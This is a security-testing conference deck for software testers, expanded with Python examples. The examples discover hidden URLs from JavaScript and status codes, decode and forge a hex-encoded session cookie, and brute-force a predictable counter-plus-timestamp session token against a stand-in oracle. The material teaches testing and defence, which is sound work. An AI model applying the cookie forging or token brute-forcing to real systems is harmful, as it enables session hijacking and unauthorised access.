4/23/15 1
Test and Verification Solutions
Security Testing: What Testers Can Do
Delivering Tailored Solutions for Hardware Verification and Software Testing
STAR East - Florida, 7th May 2015
Declan O'Riordan

What is driving security?
Firewalls / IDS / IPS based upon pattern-matching 'known bad' REGEX
COBIT, ITIL, CMMI, ISO17799, OCTAVE, OSSTMM
ISO 27005, ISO 27033, ISO 27799, ISO 15489
ISO/IEC 13335, ISO/IEC 22301:2012 & PAS77, ISO 9000, ISO 27006, ISO 15408
Copyright TVS Limited | Private & Confidential | Page 2
No one will know that sensitive function / resource URL. It's secret!
But URLs appear in logs and browser histories, and are displayed on-screen. They can be emailed, bookmarked, and written down. Attackers find them in client-side JavaScript; brute-force the names / identifiers, using the differing response codes (302, 400, 401, 403, 500) to tell resources that exist from ones that do not; infer them from published content; and pull them from search engines, web archives, and the web server itself.
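Two of the discovery techniques listed above, written out as an added example (this is not code from the slides or from TVS): pulling candidate URLs out of client-side JavaScript, and sorting forced-browsing results by status code so that "hidden" resources that answer 302/400/401/403/500 instead of 404 stand out. The JavaScript bundle, the probe results and all function names are constructed for this example.

```python
# Added example, not from the original slides. Works offline on the
# constructed data below: (1) extract URL-like literals from JavaScript,
# (2) triage guessed paths by the status code they returned.
import re
from collections import defaultdict

# Constructed sample: the kind of bundle an application serves to every
# visitor, including paths for functions the visitor is not meant to see.
SAMPLE_JS = """
var api = "/api/v1/";
function loadUser(id){ return fetch(api + "users/" + id); }
function exportAll(){ return fetch('/admin/export?format=csv'); }
// legacy: window.location = "https://example.com/internal/reports.aspx";
var img = "logo.png";
"""

# Quoted literals that start with "/" or an http(s) scheme, no whitespace.
_URL_IN_JS = re.compile(r"""["'](?P<u>(?:https?://[^"'\s]+|/[^"'\s]*))["']""")


def extract_urls(js: str) -> list:
    """Distinct URL-like string literals in a JavaScript source, in order
    of first appearance."""
    seen, out = set(), []
    for m in _URL_IN_JS.finditer(js):
        u = m.group("u")
        if u not in seen:
            seen.add(u)
            out.append(u)
    return out


# Codes that reveal a resource exists even though it was not served:
# 302 (redirect to login), 401/403 (auth/authz), 400 (a handler was
# reached and rejected the input), 500 (a handler was reached and broke).
# 404 is the only one that says "nothing here".
EXISTS_BUT_CONTROLLED = {302, 400, 401, 403, 500}


def classify(status: int) -> str:
    if status == 404:
        return "missing"
    if status in EXISTS_BUT_CONTROLLED:
        return "exists-controlled"
    if 200 <= status < 300:
        return "accessible"
    return "other"


def triage(results: dict) -> dict:
    """Group {path: status} probe results by classification so the tester
    sees which guessed names hit something real."""
    groups = defaultdict(list)
    for path, status in sorted(results.items()):
        groups[classify(status)].append(path)
    return dict(groups)


# Constructed probe results: what one name-guessing run might return.
SAMPLE_PROBES = {
    "/admin/": 302, "/admin/export": 403, "/backup/": 404,
    "/api/v1/users/1": 200, "/internal/": 500, "/old/": 404, "/debug": 400,
}

if __name__ == "__main__":
    for u in extract_urls(SAMPLE_JS):
        print("found in JS:", u)
    for kind, paths in triage(SAMPLE_PROBES).items():
        print(kind, paths)
```

The regex is deliberately loose: in a real test you feed every extracted literal into the probe list and let the status codes sort out which ones matter. Note that 400 is kept with the "exists" codes, as on the slide, because a generic router answers 404 for an unknown path; a 400 normally comes from a handler that was reached.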
HTTP is stateless: each request-response pair is an independent transaction. Dynamic web-application functionality requires a SESSION to link a user's requests. Typically this is implemented by issuing each user a unique session token, which the user resubmits with every request so that the server can link the sequence together.
Set-Cookie: ASP.NET_SessionId=75 73 65 72 3d 64 65 63 6c 61 6e 3b 61 70 70 3d 61 64 6d 69 6e 3b 64 61 74 65 3d 30 35 2f 30 37 2f 32 30 31 35
Hex-decoded, that token reads user=declan;app=admin;date=05/07/2015: it is not a random identifier but the user's identity and privilege level, encoded in a form the user can read and rewrite before resubmitting it.
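The decode-and-inspect step a tester applies to that cookie, as an added example (not code from the slides or from TVS): the token value is the one shown above; the function names and the "forge" step are mine, and a tester would of course only resubmit a forged token against a system they are authorised to test.

```python
# Added example, not from the original slides: decode the ASP.NET_SessionId
# value shown above and show why it is not a secret.

# Constructed input: the cookie value from the slide, spaces as printed.
SLIDE_TOKEN = (
    "75 73 65 72 3d 64 65 63 6c 61 6e 3b 61 70 70 3d 61 64 6d 69 6e 3b "
    "64 61 74 65 3d 30 35 2f 30 37 2f 32 30 31 35"
)

HEX_DIGITS = set("0123456789abcdefABCDEF")


def decode_hex_token(token: str):
    """Bytes behind a hex-encoded token, or None when the value is not hex
    at all (then it may be base64, encrypted, or genuinely random)."""
    cleaned = "".join(token.split())
    if not cleaned or len(cleaned) % 2 or not set(cleaned) <= HEX_DIGITS:
        return None
    return bytes.fromhex(cleaned)


def looks_like_plaintext(data: bytes) -> bool:
    """True when every byte is printable ASCII: a strong sign the token is
    encoded state rather than a random identifier."""
    return bool(data) and all(0x20 <= b < 0x7F for b in data)


def parse_fields(text: str) -> dict:
    """Split "k=v;k=v" into a dict; a part without '=' keeps value ''."""
    fields = {}
    for part in text.split(";"):
        if not part:
            continue
        k, _, v = part.partition("=")
        fields[k] = v
    return fields


def forge_token(fields: dict) -> str:
    """Re-encode fields the way the server did. Once the layout is known,
    a client can change app=... or user=... and resubmit the cookie."""
    text = ";".join(f"{k}={v}" for k, v in fields.items())
    return text.encode("ascii").hex()


def analyse(token: str) -> dict:
    """What a tester records about a token: is it encoded state, and if
    so, what does it carry?"""
    raw = decode_hex_token(token)
    if raw is None or not looks_like_plaintext(raw):
        return {"encoded_state": False, "fields": {}}
    return {"encoded_state": True, "fields": parse_fields(raw.decode("ascii"))}


if __name__ == "__main__":
    report = analyse(SLIDE_TOKEN)
    print(report)
    # A hypothetical attacker rewrites the user field and re-encodes.
    print(forge_token({**report["fields"], "user": "admin"}))
```

A token that survives this test (decodes to nothing printable, or is not hex at all) still needs the entropy and sequence checks; one that fails it is already a finding, because the server is trusting client-held state for identity and role.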
Concealed sequences, weak random number generation, time dependencies:
56543-1424798254115
56544-1424798303925
?
56546-1424798337916
The first component is an incrementing sequence. The second component is the time in milliseconds. The missing value was issued to another user and can be predicted / brute-forced within the range of possibilities: its counter must be 56545 and its timestamp must lie between 1424798303925 and 1424798337916, roughly 34,000 candidates.
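Reconstructing that search space in code, as an added example (not from the slides or from TVS): the "<counter>-<milliseconds>" format and the three observed tokens are taken from the slide; the helper names, the predictability heuristic and the stand-in validity oracle are my own, and in a real test the oracle would be "does the server accept this cookie?".

```python
# Added example, not from the original slides: enumerate the candidates
# for the token missing from the sequence shown above.
import math
from dataclasses import dataclass
from typing import Callable, Iterator, List, Optional, Tuple

# Constructed input: the three tokens observed on the slide. The fourth,
# 56545-..., was issued to another user and is the one to predict.
OBSERVED = ["56543-1424798254115", "56544-1424798303925", "56546-1424798337916"]


@dataclass(frozen=True)
class Token:
    seq: int  # incrementing counter component
    ms: int   # issue time, milliseconds since the Unix epoch


def parse_token(token: str) -> Token:
    seq, ms = token.split("-", 1)
    return Token(int(seq), int(ms))


def format_token(seq: int, ms: int) -> str:
    return f"{seq}-{ms}"


def gaps(observed: List[str]) -> List[Tuple[int, int, int]]:
    """(missing_seq, earliest_ms, latest_ms) for every counter value that
    lies between two observed tokens. The missing token was issued after
    its predecessor and before its successor, so its timestamp is bounded
    by theirs (inclusive: two tokens can share a millisecond)."""
    toks = sorted((parse_token(t) for t in observed), key=lambda t: t.seq)
    out = []
    for prev, nxt in zip(toks, toks[1:]):
        for seq in range(prev.seq + 1, nxt.seq):
            out.append((seq, prev.ms, nxt.ms))
    return out


def candidates(observed: List[str]) -> Iterator[str]:
    """Every token the gaps could hold, in issue order."""
    for seq, lo, hi in gaps(observed):
        for ms in range(lo, hi + 1):
            yield format_token(seq, ms)


def search_space(observed: List[str]) -> int:
    return sum(hi - lo + 1 for _, lo, hi in gaps(observed))


def bits_of_uncertainty(observed: List[str]) -> float:
    """Effective entropy of the missing token given what was observed."""
    n = search_space(observed)
    return math.log2(n) if n else 0.0


def looks_predictable(observed: List[str]) -> bool:
    """Cheap tester heuristic: counter rising in small steps and timestamp
    rising with it means structure, not randomness."""
    try:
        toks = sorted((parse_token(t) for t in observed), key=lambda t: t.seq)
    except ValueError:
        return False  # not in <counter>-<ms> form at all
    if len(toks) < 2:
        return False
    pairs = list(zip(toks, toks[1:]))
    return all(b.ms > a.ms for a, b in pairs) and all(1 <= b.seq - a.seq <= 10 for a, b in pairs)


def brute_force(observed: List[str], is_valid: Callable[[str], bool]) -> Tuple[Optional[str], int]:
    """Try each candidate against is_valid and return (token, guesses);
    (None, guesses) if the whole space was exhausted."""
    guesses = 0
    for tok in candidates(observed):
        guesses += 1
        if is_valid(tok):
            return tok, guesses
    return None, guesses


if __name__ == "__main__":
    print("gaps:", gaps(OBSERVED))
    print("candidates:", search_space(OBSERVED), "bits:", round(bits_of_uncertainty(OBSERVED), 2))
    # Constructed oracle standing in for the server: accepts one made-up token.
    secret = "56545-1424798320000"
    print(brute_force(OBSERVED, lambda t: t == secret))
```

About 34,000 candidates is roughly 15 bits of uncertainty; at even a modest request rate that is minutes of work, which is the number to quote when reporting this token scheme.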
• Security skills are within the project team capability
• Recognize which security tests you can do now
• Effectively manage the experts who are helping you